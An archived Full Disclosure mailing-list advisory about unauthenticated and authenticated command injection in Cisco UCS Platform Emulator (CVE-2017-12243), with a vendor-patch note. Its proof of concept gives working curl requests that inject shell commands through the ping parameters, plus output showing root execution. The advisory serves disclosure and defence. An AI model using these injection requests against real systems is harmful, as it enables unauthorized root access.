| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAAnZqX9rvk6HZyQU08zmv7GSZ8LEinWVHopm3iOESHCZX25hZA@mail.gmail.com>
Date: Wed, 1 Nov 2017 08:15:19 +0200
From: Maor Shwartz <maors@...ondsecurity.com>
To: fulldisclosure@...lists.org
Cc: SecuriTeam Secure Disclosure <ssd@...ondsecurity.com>
Subject: [FD] SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution
SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution
Full report: https://blogs.securiteam.com/index.php/archives/3362
Twitter: @SecuriTeam_SSD
Weibo: SecuriTeam_SSD
Vulnerabilities Summary
The following advisory describes two remote code execution vulnerabilities
found in Cisco UCS Platform Emulator version 3.1(2ePE1).
Cisco UCS Platform Emulator is the Cisco UCS Manager application bundled
into a virtual machine (VM). The VM includes software that emulates
hardware communications for the Cisco Unified Computing System (Cisco UCS)
hardware that is configured and managed by Cisco UCS Manager. For example,
you can use Cisco UCS Platform Emulator to create and test a supported
Cisco UCS configuration, or to duplicate an existing Cisco UCS environment
for troubleshooting or development purposes.
The vulnerabilities found in Cisco UCS Platform Emulator are:
Unauthenticated remote code execution
Authenticated remote code execution
Credit
An independent security researcher has reported this vulnerability to
Beyond Security’s SecuriTeam Secure Disclosure program
Vendor response
The vendor has released patches to address this vulnerability and issue the
following CVE:
CVE-2017-12243
Vulnerabilities details
Unauthenticated remote code execution
User controlled input is not sufficiently sanitized when passed to
IP/settings/ping function. An unauthenticated attacker can inject commands
via PING_NUM and PING_IP_ADDR parameters. Those commands will run as root
on the remote machine.
Proof of Concept
===
curl "
http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"
curl -k "
https://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"
curl "http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1"
curl -k "
https://IP/settings/ping?ping_num=1%3buname+-a%3b#&ping_ip_addr=127.0.0.1"
===
By sending one of the above requests the Cisco UCS will response with:
===
/sample output/
================
demo@...i:~/poc$ curl -k "
http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.017 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.017/0.017/0.017/0.000 ms
Linux ucspe 2.6.32-431.el6.i686 #1 SMP Fri Nov 22 00:26:36 UTC 2013 i686
i686 i386 GNU/Linux
demo@...i:~/poc$ curl "
http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1"
uid=0(root) gid=0(root) groups=0(root)
===
--
Thanks
Maor Shwartz
Beyond Security
GPG Key ID: 93CC36E2DE7FF514
Download attachment "SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution – SecuriTeam Blogs.pdf" of type "application/pdf" (133308 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists